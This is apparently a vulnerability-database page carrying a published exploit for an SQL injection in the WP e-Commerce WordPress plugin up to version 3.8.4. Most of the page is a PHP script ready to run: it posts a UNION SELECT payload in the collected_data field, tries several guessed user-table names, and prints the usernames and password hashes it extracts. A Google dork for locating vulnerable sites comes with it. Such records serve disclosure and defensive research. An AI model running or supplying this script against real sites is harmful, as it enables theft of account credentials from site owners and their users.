Lucene search
K

WordPress Plugin E-Commerce 3.8.4 - SQL Injection

🗓️ 05 Aug 2011 00:00:00Reported by IHTeamType 
exploitpack
 exploitpack
👁 11 Views

WordPress Plugin E-Commerce 3.8.4 - SQL Injection vulnerability with wp_users tabl

Code
# Exploit Title: WP E-commerce plugin <= 3.8.4 Sql Injection
# Google Dork: inurl:page_id= “Your billing/contact details”
# Date: 18/07/2011
# Author: IHTeam
# Software Link: http://www.getshopped.org/
# Version: 3.8.4
# Tested on: 3.8.4
# Original Advisory: http://www.ihteam.net/advisory/wordpress-wp-e-commerce-plugin/

<?php
/*
	WP e-Commerce <= 3.8.4 SQL Injection
	Download link: http://wordpress.org/extend/plugins/wp-e-commerce/
	Author contact: 29/06/2011
	Exploit published: 18/07/2011

	Bugged code (wpsc-theme/functions/wpsc-user_log_functions.php):
		foreach ( (array)$_POST['collected_data'] as $value_id => $value ) {
				$form_sql = "SELECT * FROM `" . WPSC_TABLE_CHECKOUT_FORMS . "` WHERE `id` = '$value_id' LIMIT 1";
				$form_data = $wpdb->get_row( $form_sql, ARRAY_A );
				
        FIX: Upgrade to version 3.8.5

 	Bug found by: IHTeam

	For GetShopped as their security auditors

 	This code has been released under the authorization of GetShopped staff.
 	It will show user_login and user_pass of wp_users table;
	
	Google Dork: inurl:page_id= "Your billing/contact details"
	Follow us on Twitter! @IHTeam
*/
function help() {
	echo "\n";
	echo " -------------------WP e-Commerce <= 3.8.4 SQL Injection---------------\n\n";
	echo "	How to use: php wp-ecommerce.php host path page_id [table_name]\n\n";
	echo "	host 		= Domain name\n";
	echo "	path 		= Path of WordPress\n";
	echo "	page_id		= Int value of the login page of WP e-commerce\n";
	echo "	table_name	= Default is wp_users\n\n";
	echo "	Example: php wp-commerce.php www.domain.com /wordpress/ 11 wp_users\n\n";
	echo " ----------------------------------------------------------------------\n\n";
}

function exploit($host,$path,$pageid,$table) {
        $url = $host.$path."?page_id=".$pageid."&edit_profile=true";
        $buggy_code=urlencode("-2' UNION ALL SELECT 2, concat(user_login,':',user_pass), 'email', 1, 1, null, 1, 2, 'billingfirstname', null, 0 from ".$table." WHERE 
'1'='1");
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL,$url);
        curl_setopt($ch, CURLOPT_POST, 3);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
	curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"collected_data[".$buggy_code."]=&submit=Save+Profile&submitwpcheckout_profile=true");
        $result= curl_exec ($ch);
        curl_close ($ch);
	
	echo "Now using table name: $table... ";
        
	preg_match("/<span class=\"wpsc_error_msg_field_name\">(.*?)<\/span>.<br \/>/", $result, $matches);
        if ( !isset($matches[1]) )
                $msg="Wrong table name or not vulnerable\n";
        else 
                $msg="Credential found: ".$matches[1]."\n";	

        return $msg;

}

if ( isset($argv[1]) && isset($argv[2]) && isset($argv[3]) ) {
	if (isset($argv[4]))
		$table = $argv[4];
	else
		$table = "wp_users";

	$host = $argv[1];
	$spos=strpos($host, "http://");
    	if(!is_int($spos)&&($spos==0))
		$host="http://$host";

	$path = $argv[2];
	$pageid=(int)$argv[3];

	/* Detecting the version, if possible */
	$version = file_get_contents($host.$path.'wp-content/plugins/wp-e-commerce/readme.txt');
	preg_match("/Stable tag: (.*)/", $version, $vmatch);
	
	if ( !isset($vmatch[1]) )	
		$version="Not detectable\n";
	else
		$version=$vmatch[1];
	
	echo "Version: ".$version."\n";
	/* End of version detecting */
	
	
	/* Executing exploit */
	preg_match('/[^.]+\.[^.]+$/', $host, $hmatch);
	$host_name=str_replace('http://','',$hmatch[0]);

	$tarray = array($table, 'wordpress_users', '_users', 'users', 'wpusers','wordpressusers', $host_name.'_users', str_replace('.','',$host_name).'_users', str_replace('.','',$host_name).'users' );

	foreach($tarray as $index => $val) { 
		echo exploit($host,$path,$pageid,$val);
	}
	/*  End of exploit */
} else
	help();

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation